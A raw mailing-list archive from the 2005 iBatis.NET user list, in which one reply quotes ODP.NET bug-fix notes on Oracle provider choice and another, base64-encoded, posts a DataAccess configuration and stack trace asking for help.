<[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_23182_1878367.1133831242747" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_23182_1878367.1133831242747 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Well, at the time when I was testing ODP.NET 9i (late last year/earlier thi= s year), the DataMapper required DeriveParameters support for stored procedures. Then there's always the bug fixes and other new features. :-= ) http://www.oracle.com/technology/docs/tech/windows/odpnet/readme10104.txt Bugs Fixed in 161.129.204.104.0 version =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D 4066828: Unmanaged exceptions return -3000 error without further informatio= n 4028378: Need attributes/methods on OracleParameter/OracleCommand classes 4020081: ODP.NET -3000 errors under high load 3937454: Calling cancel before command execution causes an error 3930596: Output bind variable initialized with blanks using ParameterDirection.OUTPUT 3897454: Aborting selecting thread fails with internal error -3000 Bugs Fixed in 161.129.204.104.01 version =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D 3912525: INSERT ARRAY OF DBNULL.VALUE CAUSES AN EXCEPTION 3908190: CONNECTION REQUEST RETURNS ORA-1034 AFTER RESTARTING THE DATABASE 3906299: ARRAYBIND WITH DBNULL.VALUE & ORACLETIMESTAMP CAUSES INTERNAL ERRO= R 3863034: DERIVEPARAMETERS RETURNS INVALIDOPERATIONEXCEPTION FOR SYS.XMLTYPE 3838832: DERIVEPARAMETERS THROWS ORACLEEXCEPTION AGAINST 161.129.204.104.1 DB 3833810: INTERNAL ERROR WHEN REQUESTING GLOBALIZATION OBJ AFTER CON IS FREE= D 3829607: OS AUTH DISABLED IF USERID OF "/" BEGINS/ENDS WITH SPACES IN QUOTE= S 3816643: MEM LEAK WHEN USING SAME CON TO OPEN MANY TIMES WITH POOLING OFF 3773442: EXECUTION FAILS AFTER DERIVEPARAMETERS FOR LONG AND LONG RAW PARAM= S 3757186: ORACLECOMMANDBUILDER.DERIVEPARAMETERS PERFORMANCE DEGRADATION 3698431: INTERNAL ERROR WHEN USING ODP.NET WITH REF CURSORS AND SYS.XMLTYPE 3450763: CREATING ORACLEXMLTYPE OBJECT FAILS AFTER A SCHEMA BASED OPERATION 3365691: ARGUMENTNULLEXCEPTION WHEN USING A SELECT STATMENT WITH WITH CLAUS= E 2925742: CALLING ORACLEDATAADAPTER.UPDATE FOR A SYNONYM FAILS Hope this helps! Roberto On 12/5/05, Jeremy Gray <[email protected]> wrote: > > Roberto, > > > > Can you provide any specific insight into your recommendation against the > 9i client? > > > > Thanks in advance, > > > > Jeremy Gray > > > ------------------------------ > > *From:* Roberto R [mailto:[email protected]] > *Sent:* Friday, December 02, 2005 10:35 AM > *To:* [email protected] > *Subject:* Re: Oracle provider with iBatis dataMapper 1.2 > > > > Tests were run for System.Data.OracleClient, ODP.NET 9i, and ODP.NET 10g. > (I would not recommend using ODP.NET 9i with the DataMapper.) > > From my experience, System.Data.OracleClient was the "easiest" to use > right away, but ODP.NET 10g offers some advanced features that could be > used outside of the DataMapper. > > Roberto > > > ------=_Part_23182_1878367.1133831242747 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Well, at the time when I was testing <a href=3D"http://ODP.NET">ODP.NET</a>= 9i (late last year/earlier this year), the DataMapper required DeriveParam= eters support for stored procedures. &nbsp; Then there's always the bug fix= es and other new features.&nbsp; :-) <br><br><a href=3D"http://www.oracle.com/technology/docs/tech/windows/odpne= t/readme10104.txt">http://www.oracle.com/technology/docs/tech/windows/odpne= t/readme10104.txt</a><br><br><pre>Bugs Fixed in 161.129.204.104.0 version<br>=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D <br>4066828: Unmanaged exceptions return -3000 error without further inform= ation<br>4028378: Need attributes/methods on OracleParameter/OracleCommand = classes<br>4020081: <a href=3D"http://ODP.NET">ODP.NET</a> -3000 errors und= er high load <br>3937454: Calling cancel before command execution causes an error<br>393= 0596: Output bind variable initialized with blanks using ParameterDirection= .OUTPUT<br>3897454: Aborting selecting thread fails with internal error -30= 00 <br></pre><pre>Bugs Fixed in 161.129.204.104.01 version<br>=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D<br>3912525: INSERT ARRAY OF DBNULL.VALUE CAUSES AN EXCEPTION <br>390819= 0: CONNECTION REQUEST RETURNS ORA-1034 AFTER RESTARTING THE DATABASE <br>3906299: ARRAYBIND WITH DBNULL.VALUE &amp; ORACLETIMESTAMP CAUSES INTER= NAL ERROR<br>3863034: DERIVEPARAMETERS RETURNS INVALIDOPERATIONEXCEPTION FO= R SYS.XMLTYPE<br>3838832: DERIVEPARAMETERS THROWS ORACLEEXCEPTION AGAINST= =20 161.129.204.104.1 DB<br>3833810: INTERNAL ERROR WHEN REQUESTING GLOBALIZATION OBJ A= FTER CON IS FREED<br>3829607: OS AUTH DISABLED IF USERID OF &quot;/&quot; B= EGINS/ENDS WITH SPACES IN QUOTES<br>3816643: MEM LEAK WHEN USING SAME CON T= O OPEN MANY TIMES WITH POOLING OFF <br>3773442: EXECUTION FAILS AFTER DERIVEPARAMETERS FOR LONG AND LONG RAW P= ARAMS<br>3757186: ORACLECOMMANDBUILDER.DERIVEPARAMETERS PERFORMANCE DEGRADA= TION<br>3698431: INTERNAL ERROR WHEN USING <a href=3D"http://ODP.NET">ODP.N= ET </a> WITH REF CURSORS AND SYS.XMLTYPE<br>3450763: CREATING ORACLEXMLTYPE OB= JECT FAILS AFTER A SCHEMA BASED OPERATION<br>3365691: ARGUMENTNULLEXCEPTION= WHEN USING A SELECT STATMENT WITH WITH CLAUSE<br>2925742: CALLING ORACLEDA= TAADAPTER.UPDATE FOR A SYNONYM FAILS</pre><br>Hope this helps!<br><br>Roberto<br><br><br><d= iv><span class=3D"gmail_quote">On 12/5/05, <b class=3D"gmail_sendername">Je= remy Gray</b> &lt;<a href=3D"mailto:[email protected]">[email protected]</a= >&gt; wrote: </span><blockquote class=3D"gmail_quote" style=3D"border-left: 1px solid rg= b(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> <div> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">Roberto,</span></font></p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">&nbsp;</span></font></p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">Can you provide any specific insig= ht into your recommendation against the 9i client?</span></font></p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">&nbsp;</span></font></p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">Thanks in advance,</span></font></= p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">&nbsp;</span></font></p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">Jeremy Gray</span></font></p> <p><font color=3D"navy" face=3D"Arial" size=3D"2"><span style=3D"font-size:= 10pt; font-family: Arial; color: navy;">&nbsp;</span></font></p> <div> <div style=3D"text-align: center;" align=3D"center"><font face=3D"Times New= Roman" size=3D"3"><span style=3D"font-size: 12pt;"> <hr align=3D"center" size=3D"2" width=3D"100%"> </span></font></div> <p><b><font face=3D"Tahoma" size=3D"2"><span style=3D"font-size: 10pt; font= -family: Tahoma; font-weight: bold;">From:</span></font></b><font face=3D"T= ahoma" size=3D"2"><span style=3D"font-size: 10pt; font-family: Tahoma;"> Ro= berto R [mailto:<a href=3D"mailto:[email protected]" target=3D"_blank" onclick= =3D"return top.js.OpenExtLink(window,event,this)">[email protected]</a= >] <br> <b><span style=3D"font-weight: bold;">Sent:</span></b> Friday, December 02,= 2005 10:35 AM<span class=3D"q"><br> <b><span style=3D"font-weight: bold;">To:</span></b> <a href=3D"mailto:user= [email protected]" target=3D"_blank" onclick=3D"return top.js.OpenExtLi= nk(window,event,this)">[email protected]</a><br> <b><span style=3D"font-weight: bold;">Subject:</span></b> Re: Oracle provid= er with iBatis dataMapper 1.2</span></span></font></p> </div> <p><font face=3D"Times New Roman" size=3D"3"><span style=3D"font-size: 12pt= ;">&nbsp;</span></font></p><span class=3D"q"> <p style=3D"margin-bottom: 12pt;"><font face=3D"Times New Roman" size=3D"3"= ><span style=3D"font-size: 12pt;">Tests were run for System.Data.OracleClient, <a href=3D"http://ODP.NET" target=3D"_blank" oncl= ick=3D"return top.js.OpenExtLink(window,event,this)">ODP.NET</a> 9i, and <a= href=3D"http://ODP.NET" target=3D"_blank" onclick=3D"return top.js.OpenExt= Link(window,event,this)"> ODP.NET</a> 10g.&nbsp; (I would not recommend using <a href=3D"http://ODP.N= ET" target=3D"_blank" onclick=3D"return top.js.OpenExtLink(window,event,thi= s)">ODP.NET</a> 9i with the DataMapper.)<br> <br> >From my experience, System.Data.OracleClient was the &quot;easiest&quot; to= use right away, but <a href=3D"http://ODP.NET" target=3D"_blank" onclick=3D"ret= urn top.js.OpenExtLink(window,event,this)">ODP.NET</a> 10g offers some adva= nced features that could be used outside of the DataMapper.&nbsp; <br> <br> Roberto<br> <br> </span></font></p> <p><font face=3D"Times New Roman" size=3D"3"><span style=3D"font-size: 12pt= ;">&nbsp;</span></font></p> </span></div> </blockquote></div><br> ------=_Part_23182_1878367.1133831242747-- From [email protected] Tue Dec 06 02:34:42 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28775 invoked from network); 6 Dec 2005 02:34:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Dec 2005 02:34:42 -0000 Received: (qmail 89208 invoked by uid 500); 6 Dec 2005 02:34:41 -0000 Delivered-To: [email protected] Received: (qmail 89120 invoked by uid 500); 6 Dec 2005 02:34:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89108 invoked by uid 99); 6 Dec 2005 02:34:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 18:34:40 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Dec 2005 18:34:39 -0800 Received: by zproxy.gmail.com with SMTP id f1so1306113nzc for <[email protected]>; Mon, 05 Dec 2005 18:34:18 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=CUK/SMhBg4fbdqZBo4Fe1JFPrGSoJi5c58NOoSdrQrzcZhPUXAxhfyBiwFKcJ+PvUb3y+VmsyDZCeduJegkvD3RKNhxdoIpitTNC/eUGuTnU4GXF2zW+xKW97g7CC9ZfPf06BprCspVq92sJOmu0JbPvP+9GByBvXq4q36DLMyg= Received: by 161.129.204.104 with SMTP id c6mr3548304qbo; Mon, 05 Dec 2005 18:34:18 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 5 Dec 2005 18:34:18 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 6 Dec 2005 10:34:18 +0800 From: fly abroad <[email protected]> To: [email protected] Subject: Re: Using iBatis.NET DataAccess with NHibernate AND SqlMap In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_13_27525347.1133836458450" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_13_27525347.1133836458450 Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline SSB3YW50IHRvIHVzZSBEYXRhQWNjZXNzIHdpdGggU3FsTWFwcGVyLmJ1dCBlcnJvcnMgdGhlcmUu CgpJIHVzZSBwcm92aWRlciBmb3Igb3JhY2xlo7oKIDxwcm92aWRlcgogIG5hbWU9Im9yYWNsZUNs aWVudDEuMCIKICBkZXNjcmlwdGlvbj0iT3JhY2xlLCBNaWNyb3NvZnQgcHJvdmlkZXIgVjEuMC41 MDAwLjAiCiAgZW5hYmxlZD0idHJ1ZSIKICBkZWZhdWx0PSJmYWxzZSIKICBhc3NlbWJseU5hbWU9 IlN5c3RlbS5EYXRhLk9yYWNsZUNsaWVudCwgVmVyc2lvbj0xLjAuNTAwMC4wLApDdWx0dXJlPW5l dXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiCiAgY29ubmVjdGlvbkNsYXNz PSJTeXN0ZW0uRGF0YS5PcmFjbGVDbGllbnQuT3JhY2xlQ29ubmVjdGlvbiIKICBjb21tYW5kQ2xh c3M9IlN5c3RlbS5EYXRhLk9yYWNsZUNsaWVudC5PcmFjbGVDb21tYW5kIgogIHBhcmFtZXRlckNs YXNzPSJTeXN0ZW0uRGF0YS5PcmFjbGVDbGllbnQuT3JhY2xlUGFyYW1ldGVyIgogIHBhcmFtZXRl ckRiVHlwZUNsYXNzPSJTeXN0ZW0uRGF0YS5PcmFjbGVDbGllbnQuT3JhY2xlVHlwZSIKICBwYXJh bWV0ZXJEYlR5cGVQcm9wZXJ0eT0iT3JhY2xlVHlwZSIKICBkYXRhQWRhcHRlckNsYXNzPSJTeXN0 ZW0uRGF0YS5PcmFjbGVDbGllbnQuT3JhY2xlRGF0YUFkYXB0ZXIiCiAgY29tbWFuZEJ1aWxkZXJD bGFzcz0iU3lzdGVtLkRhdGEuT3JhY2xlQ2xpZW50Lk9yYWNsZUNvbW1hbmRCdWlsZGVyIgogIHVz ZVBvc2l0aW9uYWxQYXJhbWV0ZXJzID0gImZhbHNlIgogIHVzZVBhcmFtZXRlclByZWZpeEluU3Fs ID0gInRydWUiCiAgdXNlUGFyYW1ldGVyUHJlZml4SW5QYXJhbWV0ZXIgPSAiZmFsc2UiCiAgcGFy YW1ldGVyUHJlZml4PSI6IgogLz4KCmRhby5jb25maWcgYXOjugo8P3htbCB2ZXJzaW9uPSIxLjAi IGVuY29kaW5nPSJ1dGYtOCI/Pgo8ZGFvQ29uZmlnIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5v cmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiID4KCiA8cHJvdmlkZXJzIHJlc291cmNlPSJwcm92 aWRlcnMuY29uZmlnIi8+CgogPGNvbnRleHQgaWQ9IlNxbE1hcERhbyIgZGVmYXVsdD0idHJ1ZSI+ CgogIDxkYXRhYmFzZT4KICAgPHByb3ZpZGVyIG5hbWU9Im9yYWNsZUNsaWVudDEuMCIvPgogICA8 ZGF0YVNvdXJjZSBuYW1lPSJpYmF0aXNEZW1vIiBjb25uZWN0aW9uU3RyaW5nPSJEYXRhClNvdXJj ZT1EQVRBLTg5O1BlcnNpc3QgU2VjdXJpdHkgSW5mbz1UcnVlO1VzZXIgSUQ9ZGF0YTtwYXNzd29y ZD1kYXRhIi8+CiAgPC9kYXRhYmFzZT4KCiAgPGRhb1Nlc3Npb25IYW5kbGVycz4KICA8ZGFvU2Vz c2lvbkhhbmRsZXIgaWQ9IlNxbE1hcCI+CiAgIDxwcm9wZXJ0eSBuYW1lPSJyZXNvdXJjZSIgdmFs dWU9InNxbE1hcC5jb25maWciLz4KICA8L2Rhb1Nlc3Npb25IYW5kbGVyPgogIDwvZGFvU2Vzc2lv bkhhbmRsZXJzPgoKICA8ZGFvRmFjdG9yeT4KICAgPGRhbyBpbnRlcmZhY2U9Ik9yYVRlc3QuSVBy b2R1Y3QiICBpbXBsZW1lbnRhdGlvbj0iT3JhVGVzdC5Qcm9kdWN0REFPCiIvPgogIDwvZGFvRmFj dG9yeT4KIDwvY29udGV4dD4KCjwvZGFvQ29uZmlnPgpidXQgZXJyb3Jzo7oKClVuaGFuZGxlZCBF eGNlcHRpb246IElCYXRpc05ldC5Db21tb24uRXhjZXB0aW9ucy5Db25maWd1cmF0aW9uRXhjZXB0 aW9uOgotIFRoZSBlcnJvciBvY2N1cnJlZCB3aGlsZSBhZGQgZ2xvYmFsIHByb3BlcnRpZXMuCi0g Y29uZmlndXJlIHByb3ZpZGVyCi0gVGhlIGVycm9yIG9jY3VycmVkIGluIDxwcm92aWRlciBuYW1l PSJvcmFjbGVDbGllbnQxLjAiIC8+LgotIENoZWNrIHRoZSBvcmFjbGVDbGllbnQxLjAuIC0tLT4g U3lzdGVtLk51bGxSZWZlcmVuY2VFeGNlcHRpb246IE9iamVjdApyZWZlcmVuYwplIG5vdCBzZXQg dG8gYW4gaW5zdGFuY2Ugb2YgYW4gb2JqZWN0LgogICBhdCBJQmF0aXNOZXQuRGF0YUFjY2Vzcy5D b25maWd1cmF0aW9uLkRvbURhb01hbmFnZXJCdWlsZGVyLlBhcnNlUHJvdmlkZXIKKENvbmYKaWd1 cmF0aW9uU2NvcGUgY29uZmlndXJhdGlvblNjb3BlKQogICBhdCBJQmF0aXNOZXQuRGF0YUFjY2Vz cy5Db25maWd1cmF0aW9uLkRvbURhb01hbmFnZXJCdWlsZGVyLkdldENvbnRleHRzCihDb25maWcK dXJhdGlvblNjb3BlIGNvbmZpZ3VyYXRpb25TY29wZSkKICAgYXQKSUJhdGlzTmV0LkRhdGFBY2Nl c3MuQ29uZmlndXJhdGlvbi5Eb21EYW9NYW5hZ2VyQnVpbGRlci5CdWlsZERhb01hbmFnZXJzKFgK bWxEb2N1bWVudCBkb2N1bWVudCwgQm9vbGVhbiB1c2VDb25maWdGaWxlV2F0Y2hlcikKICAgLS0t IEVuZCBvZiBpbm5lciBleGNlcHRpb24gc3RhY2sgdHJhY2UgLS0tCiAgIGF0CklCYXRpc05ldC5E YXRhQWNjZXNzLkNvbmZpZ3VyYXRpb24uRG9tRGFvTWFuYWdlckJ1aWxkZXIuQnVpbGREYW9NYW5h Z2VycyhYCm1sRG9jdW1lbnQgZG9jdW1lbnQsIEJvb2xlYW4gdXNlQ29uZmlnRmlsZVdhdGNoZXIp CiAgIGF0IElCYXRpc05ldC5EYXRhQWNjZXNzLkNvbmZpZ3VyYXRpb24uRG9tRGFvTWFuYWdlckJ1 aWxkZXIuQ29uZmlndXJlKFN0cmluZwpyCmVzb3VyY2UpCiAgIGF0IElCYXRpc05ldC5EYXRhQWNj ZXNzLkNvbmZpZ3VyYXRpb24uRG9tRGFvTWFuYWdlckJ1aWxkZXIuQ29uZmlndXJlKCkKICAgYXQg T3JhVGVzdC5CYXNlRGFvLkdldExvY2FsU3FsTWFwKCkgaW4KRTpcd29ya19uZXRcaWJhdGlzTmV0 XERBVGVzdFxPcmFUZXN0XEIKYXNlREFPLmNzOmxpbmUgMjkKICAgYXQgT3JhVGVzdC5CYXNlRGFv LkV4ZWN1dGVRdWVyeUZvckxpc3QoU3RyaW5nIHN0YXRlbWVudE5hbWUsIE9iamVjdApwYXJhbWV0 ZXIKT2JqZWN0KSBpbiBFOlx3b3JrX25ldFxpYmF0aXNOZXRcREFUZXN0XE9yYVRlc3RcQmFzZURB Ty5jczpsaW5lIDQ2CiAgIGF0IE9yYVRlc3QuUHJvZHVjdERBTy5HZXRQcm9kdWN0TGlzdCgpIGlu CkU6XHdvcmtfbmV0XGliYXRpc05ldFxEQVRlc3RcT3JhVGVzCnRcUHJvZHVjdERBTy5jczpsaW5l IDE2CiAgIGF0IE9yYVRlc3QuUHJvZ3JhbS5NYWluKCkgaW4KRTpcd29ya19uZXRcaWJhdGlzTmV0 XERBVGVzdFxPcmFUZXN0XFByb2dyYW0uY3M6CmxpbmUgMTcK ------=_Part_13_27525347.1133836458450 Content-Type: text/html; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline PGRpdj5JIHdhbnQgdG8gdXNlIERhdGFBY2Nlc3Mgd2l0aCBTcWxNYXBwZXIuYnV0IGVycm9ycyB0 aGVyZS48L2Rpdj4KPGRpdj4mbmJzcDs8L2Rpdj4KPGRpdj5JIHVzZSBwcm92aWRlciBmb3Igb3Jh Y2xlo7o8YnI+Jm5ic3A7Jmx0O3Byb3ZpZGVyIDxicj4mbmJzcDsmbmJzcDtuYW1lPSZxdW90O29y YWNsZUNsaWVudDEuMCZxdW90OyA8YnI+Jm5ic3A7Jm5ic3A7ZGVzY3JpcHRpb249JnF1b3Q7T3Jh Y2xlLCBNaWNyb3NvZnQgcHJvdmlkZXIgVjEuMC41MDAwLjAmcXVvdDs8YnI+Jm5ic3A7Jm5ic3A7 ZW5hYmxlZD0mcXVvdDt0cnVlJnF1b3Q7IDxicj4mbmJzcDsmbmJzcDtkZWZhdWx0PSZxdW90O2Zh bHNlJnF1b3Q7PGJyPgombmJzcDsmbmJzcDthc3NlbWJseU5hbWU9JnF1b3Q7U3lzdGVtLkRhdGEu T3JhY2xlQ2xpZW50LCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSZxdW90OyA8YnI+Jm5ic3A7Jm5ic3A7Y29ubmVjdGlv bkNsYXNzPSZxdW90O1N5c3RlbS5EYXRhLk9yYWNsZUNsaWVudC5PcmFjbGVDb25uZWN0aW9uJnF1 b3Q7Jm5ic3A7IDxicj4mbmJzcDsmbmJzcDtjb21tYW5kQ2xhc3M9JnF1b3Q7ClN5c3RlbS5EYXRh Lk9yYWNsZUNsaWVudC5PcmFjbGVDb21tYW5kJnF1b3Q7IDxicj4mbmJzcDsmbmJzcDtwYXJhbWV0 ZXJDbGFzcz0mcXVvdDtTeXN0ZW0uRGF0YS5PcmFjbGVDbGllbnQuT3JhY2xlUGFyYW1ldGVyJnF1 b3Q7IDxicj4mbmJzcDsmbmJzcDtwYXJhbWV0ZXJEYlR5cGVDbGFzcz0mcXVvdDtTeXN0ZW0uRGF0 YS5PcmFjbGVDbGllbnQuT3JhY2xlVHlwZSZxdW90OyA8YnI+Jm5ic3A7Jm5ic3A7cGFyYW1ldGVy RGJUeXBlUHJvcGVydHk9JnF1b3Q7T3JhY2xlVHlwZSZxdW90OyAKPGJyPiZuYnNwOyZuYnNwO2Rh dGFBZGFwdGVyQ2xhc3M9JnF1b3Q7U3lzdGVtLkRhdGEuT3JhY2xlQ2xpZW50Lk9yYWNsZURhdGFB ZGFwdGVyJnF1b3Q7IDxicj4mbmJzcDsmbmJzcDtjb21tYW5kQnVpbGRlckNsYXNzPSZxdW90O1N5 c3RlbS5EYXRhLk9yYWNsZUNsaWVudC5PcmFjbGVDb21tYW5kQnVpbGRlciZxdW90OyA8YnI+Jm5i c3A7Jm5ic3A7dXNlUG9zaXRpb25hbFBhcmFtZXRlcnMgPSAmcXVvdDtmYWxzZSZxdW90OyA8YnI+ Jm5ic3A7Jm5ic3A7dXNlUGFyYW1ldGVyUHJlZml4SW5TcWwgPSAmcXVvdDt0cnVlJnF1b3Q7IAo8 YnI+Jm5ic3A7Jm5ic3A7dXNlUGFyYW1ldGVyUHJlZml4SW5QYXJhbWV0ZXIgPSAmcXVvdDtmYWxz ZSZxdW90OyA8YnI+Jm5ic3A7Jm5ic3A7cGFyYW1ldGVyUHJlZml4PSZxdW90OzomcXVvdDsgPGJy PiZuYnNwOy8mZ3Q7PC9kaXY+CjxwPmRhby5jb25maWcgYXOjujxicj4mbHQ7P3htbCB2ZXJzaW9u PSZxdW90OzEuMCZxdW90OyBlbmNvZGluZz0mcXVvdDt1dGYtOCZxdW90Oz8mZ3Q7PGJyPiZsdDtk YW9Db25maWcgeG1sbnM6eHNpPSZxdW90OzxhIGhyZWY9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEv WE1MU2NoZW1hLWluc3RhbmNlIj5odHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0 YW5jZTwvYT4mcXVvdDsgJmd0Owo8YnI+Jm5ic3A7Jm5ic3A7PGJyPiZuYnNwOyZsdDtwcm92aWRl cnMgcmVzb3VyY2U9JnF1b3Q7cHJvdmlkZXJzLmNvbmZpZyZxdW90Oy8mZ3Q7PC9wPgo8cD4mbmJz cDsmbHQ7Y29udGV4dCBpZD0mcXVvdDtTcWxNYXBEYW8mcXVvdDsgZGVmYXVsdD0mcXVvdDt0cnVl JnF1b3Q7Jmd0Ozxicj4mbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7PGJyPiZuYnNwOyZuYnNwOyZs dDtkYXRhYmFzZSZndDs8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jmx0O3Byb3ZpZGVyIG5hbWU9JnF1 b3Q7b3JhY2xlQ2xpZW50MS4wJnF1b3Q7LyZndDs8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jmx0O2Rh dGFTb3VyY2UgbmFtZT0mcXVvdDtpYmF0aXNEZW1vJnF1b3Q7IGNvbm5lY3Rpb25TdHJpbmc9JnF1 b3Q7RGF0YSBTb3VyY2U9REFUQS04OTtQZXJzaXN0IFNlY3VyaXR5IEluZm89VHJ1ZTtVc2VyIElE PWRhdGE7cGFzc3dvcmQ9ZGF0YSZxdW90Oy8mZ3Q7Cjxicj4mbmJzcDsmbmJzcDsmbHQ7L2RhdGFi YXNlJmd0OyAmbmJzcDsmbmJzcDs8YnI+Jm5ic3A7Jm5ic3A7PGJyPiZuYnNwOyZuYnNwOyZsdDtk YW9TZXNzaW9uSGFuZGxlcnMmZ3Q7PGJyPiZuYnNwOyZuYnNwOyZsdDtkYW9TZXNzaW9uSGFuZGxl ciBpZD0mcXVvdDtTcWxNYXAmcXVvdDsmZ3Q7PGJyPiZuYnNwOyZuYnNwOyZuYnNwOyZsdDtwcm9w ZXJ0eSBuYW1lPSZxdW90O3Jlc291cmNlJnF1b3Q7IHZhbHVlPSZxdW90O3NxbE1hcC5jb25maWcm cXVvdDsvJmd0Ozxicj4mbmJzcDsmbmJzcDsmbHQ7L2Rhb1Nlc3Npb25IYW5kbGVyJmd0Owo8YnI+ Jm5ic3A7Jm5ic3A7Jmx0Oy9kYW9TZXNzaW9uSGFuZGxlcnMmZ3Q7PGJyPiZuYnNwOyZuYnNwOzxi cj4mbmJzcDsmbmJzcDsmbHQ7ZGFvRmFjdG9yeSZndDs8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jmx0 O2RhbyBpbnRlcmZhY2U9JnF1b3Q7T3JhVGVzdC5JUHJvZHVjdCZxdW90OyZuYnNwOyBpbXBsZW1l bnRhdGlvbj0mcXVvdDtPcmFUZXN0LlByb2R1Y3REQU8mcXVvdDsvJmd0OyZuYnNwOyZuYnNwOyZu YnNwOzxicj4mbmJzcDsmbmJzcDsmbHQ7L2Rhb0ZhY3RvcnkmZ3Q7PGJyPiZuYnNwOyZsdDsvY29u dGV4dCZndDs8YnI+CiZuYnNwOzxicj4mbHQ7L2Rhb0NvbmZpZyZndDs8L3A+CjxkaXY+YnV0IGVy cm9yc6O6PC9kaXY+CjxkaXY+PGJyPlVuaGFuZGxlZCBFeGNlcHRpb246IElCYXRpc05ldC5Db21t b24uRXhjZXB0aW9ucy5Db25maWd1cmF0aW9uRXhjZXB0aW9uOjxicj4tIFRoZSBlcnJvciBvY2N1 cnJlZCB3aGlsZSBhZGQgZ2xvYmFsIHByb3BlcnRpZXMuPGJyPi0gY29uZmlndXJlIHByb3ZpZGVy PGJyPi0gVGhlIGVycm9yIG9jY3VycmVkIGluICZsdDtwcm92aWRlciBuYW1lPSZxdW90O29yYWNs ZUNsaWVudDEuMAomcXVvdDsgLyZndDsuPGJyPi0gQ2hlY2sgdGhlIG9yYWNsZUNsaWVudDEuMC4g LS0tJmd0OyBTeXN0ZW0uTnVsbFJlZmVyZW5jZUV4Y2VwdGlvbjogT2JqZWN0IHJlZmVyZW5jPGJy PmUgbm90IHNldCB0byBhbiBpbnN0YW5jZSBvZiBhbiBvYmplY3QuPGJyPiZuYnNwOyZuYnNwOyBh dCBJQmF0aXNOZXQuRGF0YUFjY2Vzcy5Db25maWd1cmF0aW9uLkRvbURhb01hbmFnZXJCdWlsZGVy LlBhcnNlUHJvdmlkZXIKKENvbmY8YnI+aWd1cmF0aW9uU2NvcGUgY29uZmlndXJhdGlvblNjb3Bl KTxicj4mbmJzcDsmbmJzcDsgYXQgSUJhdGlzTmV0LkRhdGFBY2Nlc3MuQ29uZmlndXJhdGlvbi5E b21EYW9NYW5hZ2VyQnVpbGRlci5HZXRDb250ZXh0cyhDb25maWc8YnI+dXJhdGlvblNjb3BlIGNv 